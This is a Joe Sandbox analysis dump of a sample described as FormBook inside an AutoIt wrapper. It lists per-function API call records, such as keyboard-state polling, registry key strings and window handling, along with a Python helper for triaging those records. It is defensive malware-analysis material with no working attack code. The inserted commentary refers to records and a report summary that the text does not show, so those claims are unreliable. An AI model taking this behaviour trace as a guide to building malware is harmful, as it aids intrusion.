                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 33c0f63da7986be29c5934043bd34a3525c02a9958a5b2cec6735061625cdaa7
                                                      • Instruction ID: 27d3661c8e8d3b15247d84315d2438d3539530c83db5ac2a1169b7f20b2b7cca
                                                      • Opcode Fuzzy Hash: 33c0f63da7986be29c5934043bd34a3525c02a9958a5b2cec6735061625cdaa7
                                                      • Instruction Fuzzy Hash: 6D419A3125029E9FCF50EF91DE91EEE3361AF15300F5045A8FD915B292EB30AD5ACBA0
                                                      APIs
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                        • Part of subcall function 00A67A84: _memmove.LIBCMT ref: 00A67B0D
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AC55D2
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AC55E8
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AC55F9
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AC560B
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AC561C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: a7af4036d39133e4a0a220ea33ce52cf61f8c2b35057d3313e4949c1d47b68be
                                                      • Instruction ID: 962dd668365230354197fd62b6a3319669e32a1afa6ab41aa625e5ec9c10bf9d
                                                      • Opcode Fuzzy Hash: a7af4036d39133e4a0a220ea33ce52cf61f8c2b35057d3313e4949c1d47b68be
                                                      • Instruction Fuzzy Hash: 1A11C820D6115979D720F7B1DC49EFFBBBCEF91B04F840469B421A20D2DE602D85C5A1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: ae079b5c8798b5bd7eb45605c71aebdefde7946f423bd9fdb99cae4844dcb29f
                                                      • Instruction ID: 6c33c179458a3941615e2c55f1566dd4a26f28225afeece13f09937b35fa9d65
                                                      • Opcode Fuzzy Hash: ae079b5c8798b5bd7eb45605c71aebdefde7946f423bd9fdb99cae4844dcb29f
                                                      • Instruction Fuzzy Hash: D011D231904125AFCB24EB64ED4AFEB77BCDB44710F0501BAF544A6091EF709E8287A5
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00AC521C
                                                        • Part of subcall function 00A80719: timeGetTime.WINMM(?,7608B400,00A70FF9), ref: 00A8071D
                                                      • Sleep.KERNEL32(0000000A), ref: 00AC5248
                                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00AC526C
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AC528E
                                                      • SetActiveWindow.USER32 ref: 00AC52AD
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AC52BB
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AC52DA
                                                      • Sleep.KERNEL32(000000FA), ref: 00AC52E5
                                                      • IsWindow.USER32 ref: 00AC52F1
                                                      • EndDialog.USER32(00000000), ref: 00AC5302
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: c667644140d58debd08aa71571007be1f51fe6fe150601a341009845b3aab745
                                                      • Instruction ID: 2a488445f2fe26233e027301be98758355ce20a4d255eda0b3dc1cd9797cbf49
                                                      • Opcode Fuzzy Hash: c667644140d58debd08aa71571007be1f51fe6fe150601a341009845b3aab745
                                                      • Instruction Fuzzy Hash: 7021C670544784AFE7109BB0EDD8F257BA9EB65346F01042CF5018A1B1DF71AD828B25
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • CoInitialize.OLE32(00000000), ref: 00ACD855
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00ACD8E8
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00ACD8FC
                                                      • CoCreateInstance.OLE32(00AF2D7C,00000000,00000001,00B1A89C,?), ref: 00ACD948
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00ACD9B7
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00ACDA0F
                                                      • _memset.LIBCMT ref: 00ACDA4C
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00ACDA88
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00ACDAAB
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00ACDAB2
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00ACDAE9
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00ACDAEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: 7dd7d3bf74838d17491826cefb23b636884281425073f9dbbcbd8e346bedf760
                                                      • Instruction ID: e9388fbdee48f6188aabaf4264b999f32fa761f23201a3c97bb853f0810a9b86
                                                      • Opcode Fuzzy Hash: 7dd7d3bf74838d17491826cefb23b636884281425073f9dbbcbd8e346bedf760
                                                      • Instruction Fuzzy Hash: 2FB1EB75A00109AFDB04DFA5C988EAEBBF9FF48314B158469F509EB261DB30ED45CB50
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00AC05A7
                                                      • SetKeyboardState.USER32(?), ref: 00AC0612
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00AC0632
                                                      • GetKeyState.USER32(000000A0), ref: 00AC0649
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00AC0678
                                                      • GetKeyState.USER32(000000A1), ref: 00AC0689
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00AC06B5
                                                      • GetKeyState.USER32(00000011), ref: 00AC06C3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00AC06EC
                                                      • GetKeyState.USER32(00000012), ref: 00AC06FA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00AC0723
                                                      • GetKeyState.USER32(0000005B), ref: 00AC0731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 363301589b072a9fcfdaa685f1f6790f94bb5f716af023f4ada2cbf4fe9f696e
                                                      • Instruction ID: fb210bf7587e567a6e7bedbea5438010c8eb2be479ad5644e8db69c75c64f728
                                                      • Opcode Fuzzy Hash: 363301589b072a9fcfdaa685f1f6790f94bb5f716af023f4ada2cbf4fe9f696e
                                                      • Instruction Fuzzy Hash: 2651CC60A047889AFF35DBA08554FEABFB49F12340F09859DD5C25B1C2DAA49B4CCF61
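Three of the function records above belong to the AutoIt3 interpreter that wraps this sample rather than to the FormBook payload: the script loader whose strings include `>>>AUTOIT SCRIPT<<<`, `AU3!` and `EA06` (the compiled-script header markers), the `mciSendStringW` "PlayMe" function, and the `GetAsyncKeyState`/`GetKeyState` function that polls only the modifier keys (0xA0 LSHIFT, 0xA1 RSHIFT, 0x11 CONTROL, 0x12 MENU, 0x5B LWIN). Telling such runtime boilerplate apart from payload code is the first triage step in a report with thousands of records. The script below is an added example, not Joe Sandbox or AutoIt code: it parses records in the "APIs / Similarity / API ID / String ID" layout used on this page and tags them with heuristics that are this example's own assumptions (the marker strings identify the script loader; a key-state function that touches only modifier VK codes is consistent with AutoIt's `Send()` state restore and is not by itself evidence of keylogging). The report text it parses is constructed here from the records above.

```python
"""Triage helper for Joe Sandbox function records (added example, not Joe Sandbox code).

Parses per-function blocks in the "APIs" / "Similarity" layout of this report and
tags each record. Tag rules are this example's own heuristics, not report output.
"""
import re
from dataclasses import dataclass, field

# Assumption: these strings mark the compiled-AutoIt script header / resource, so a
# function carrying them is the interpreter's script loader, not the dropped payload.
AUTOIT_MARKERS = ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<")
# Virtual-key codes as they appear in the report: LSHIFT, RSHIFT, CONTROL, MENU, LWIN.
MODIFIER_VKS = {"000000A0", "000000A1", "00000011", "00000012", "0000005B"}

# One API call line: optional "Part of subcall function XXXX:" prefix, Name.MODULE(args), ref: addr
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                      r"([A-Za-z_]\w*)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]+)")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (name, module, args, ref)
    api_id: str = ""
    string_id: str = ""

def parse_records(text):
    """Split report text into one FunctionRecord per 'APIs' block."""
    records, current = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            name, module, args, ref = m.groups()
            current.apis.append((name, module, args or "", ref))
        elif s.startswith("• API ID:"):
            current.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• String ID:"):
            current.string_id = s.split(":", 1)[1].strip()
    return records

def classify(rec):
    """Return the set of heuristic tags for one record."""
    tags = set()
    if any(marker in rec.string_id for marker in AUTOIT_MARKERS):
        tags.add("autoit-script-loader")
    polled = {args for name, _, args, _ in rec.apis
              if name in ("GetAsyncKeyState", "GetKeyState")}
    if polled and polled <= MODIFIER_VKS:
        tags.add("modifier-key-poll")   # consistent with AutoIt Send(); not keylogging alone
    if any(name == "mciSendStringW" for name, *_ in rec.apis):
        tags.add("mci-sound")
    return tags

# Constructed sample: abridged copies of three records from this report.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00A80B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A66C6C,?,00008000), ref: 00A80BB7
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A66D0D
Strings
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
APIs
• GetKeyboardState.USER32(?), ref: 00AC05A7
• GetAsyncKeyState.USER32(000000A0), ref: 00AC0632
• GetKeyState.USER32(000000A0), ref: 00AC0649
• GetAsyncKeyState.USER32(00000011), ref: 00AC06B5
• GetKeyState.USER32(0000005B), ref: 00AC0731
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AC560B
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$play PlayMe
"""

def triage(text):
    """Return [(api_id, sorted tags)] for every record in the text."""
    return [(r.api_id, sorted(classify(r))) for r in parse_records(text)]

if __name__ == "__main__":
    for api_id, tags in triage(SAMPLE_REPORT):
        print(f"{api_id:45s} {', '.join(tags) or '-'}")
```

Run it against a full report export to get a first pass at which records are interpreter code; anything untagged that writes to foreign memory or queues APCs (the injection signatures listed in the report summary) is where the payload analysis should start.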
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00ABC746
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ABC758
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ABC7B6
                                                      • GetDlgItem.USER32(?,00000002), ref: 00ABC7C1
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ABC7D3
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ABC827
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ABC835
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ABC846
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ABC889
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ABC897
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ABC8B4
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ABC8C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: c28e65238b94aae38f67b03449812d7a6bacc4dd245c8e834bcbf6979b5ea018
                                                      • Instruction ID: e1f9d70c756963f19fabf82fb0232655a69985c34edbdb148693e3b615ef7d91
                                                      • Opcode Fuzzy Hash: c28e65238b94aae38f67b03449812d7a6bacc4dd245c8e834bcbf6979b5ea018
                                                      • Instruction Fuzzy Hash: 25515F71B00245AFDF18CFA8DD99EAEBBBAEB88310F14812DF515D7291D7709D408B10
                                                      APIs
                                                        • Part of subcall function 00A61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A62036,?,00000000,?,?,?,?,00A616CB,00000000,?), ref: 00A61B9A
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A620D3
                                                      • KillTimer.USER32(-00000001,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A6216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00A9BEF6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A9BF27
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A9BF3E
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A9BF5A
                                                      • DeleteObject.GDI32(00000000), ref: 00A9BF6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 88384febb585986ba2cd52ae73f69e87a1f3479d9f74e81f958d1bed9d9b9946
                                                      • Instruction ID: 3004f8ee2f8b4178021aec0f46ce8a6b105239765f68bb6cf8b8a43203aabefa
                                                      • Opcode Fuzzy Hash: 88384febb585986ba2cd52ae73f69e87a1f3479d9f74e81f958d1bed9d9b9946
                                                      • Instruction Fuzzy Hash: 5A617931614A50EFCB35DF14EE88B2AB7F1FB40316F108569E5429B9A0CB71AC92DF90
                                                      APIs
                                                        • Part of subcall function 00A625DB: GetWindowLongW.USER32(?,000000EB), ref: 00A625EC
                                                      • GetSysColor.USER32(0000000F), ref: 00A621D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: ba42bbe2034645db0ad563ab775d8d96becaecbcc97644def28957fdbdaef1e0
                                                      • Instruction ID: 55665642e167841235151f0fcd3b62b8cdec7cc0ed8b43ac1c47918ced702d37
                                                      • Opcode Fuzzy Hash: ba42bbe2034645db0ad563ab775d8d96becaecbcc97644def28957fdbdaef1e0
                                                      • Instruction Fuzzy Hash: 04417E311009849EDB259F78EC98BB93BB5EB06331F248365FE658E1E6C7318D42DB61
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,00AEF910), ref: 00ACAB76
                                                      • GetDriveTypeW.KERNEL32(00000061,00B1A620,00000061), ref: 00ACAC40
                                                      • _wcscpy.LIBCMT ref: 00ACAC6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 89fe27547e2304ccebd2ec9f4b583ab865cf368b5cff533f5614b0c33b6a2d00
                                                      • Instruction ID: fc332f34f423246b928f5de3cab870e11cd0320e20e0f64c60a1760707bd7c82
                                                      • Opcode Fuzzy Hash: 89fe27547e2304ccebd2ec9f4b583ab865cf368b5cff533f5614b0c33b6a2d00
                                                      • Instruction Fuzzy Hash: F051AE312083059FC710EF14C991EAAB7B6EFA0318F55482DF4969B2A2DB31AD49CB53
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 6679628f68e7a96e7533cbcf1b320053e26bf3f816a2df29dde492eb1cde2cb5
                                                      • Instruction ID: 459a0176ca98648986e9c2a15d248f4363b326cd9feb8382eb05e1a4232b3e22
                                                      • Opcode Fuzzy Hash: 6679628f68e7a96e7533cbcf1b320053e26bf3f816a2df29dde492eb1cde2cb5
                                                      • Instruction Fuzzy Hash: 4341C072604205AFEF24AB78DD42F7BB7F8EB44310F2048AEE549D72A5EA719D41CB11
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE73D9
                                                      • CreateMenu.USER32 ref: 00AE73F4
                                                      • SetMenu.USER32(?,00000000), ref: 00AE7403
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE7490
                                                      • IsMenu.USER32(?), ref: 00AE74A6
                                                      • CreatePopupMenu.USER32 ref: 00AE74B0
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AE74DD
                                                      • DrawMenuBar.USER32 ref: 00AE74E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: f456afa61f79ada4366ce127fc2338b3c2bb5721959ced520afadb22b1d30362
                                                      • Instruction ID: a7eed4890d6668c4392a775b04c07ed1fae1f6f97561bb4816c466bbe6f4eed3
                                                      • Opcode Fuzzy Hash: f456afa61f79ada4366ce127fc2338b3c2bb5721959ced520afadb22b1d30362
                                                      • Instruction Fuzzy Hash: 53413875A01285EFDB20DFA5D884A9ABBF5FF49310F144029E9559B3A0DB31A910DF60
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AE77CD
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00AE77D4
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AE77E7
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00AE77EF
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AE77FA
                                                      • DeleteDC.GDI32(00000000), ref: 00AE7803
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00AE780D
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00AE7821
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00AE782D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 16c46a080ad80fb73241bfb2a67c70ebd33bcd7b29f46ef3130b8bacaa3d8ac6
                                                      • Instruction ID: 3dc423a6f033c750f2d3e20b114934ca708d0529b7e17b7678f19a556d0f16e2
                                                      • Opcode Fuzzy Hash: 16c46a080ad80fb73241bfb2a67c70ebd33bcd7b29f46ef3130b8bacaa3d8ac6
                                                      • Instruction Fuzzy Hash: AA319C32105295BFDF119FA5DC48FEB3B69FF09320F110224FA15AA0A0CB31D822DBA4
                                                      APIs
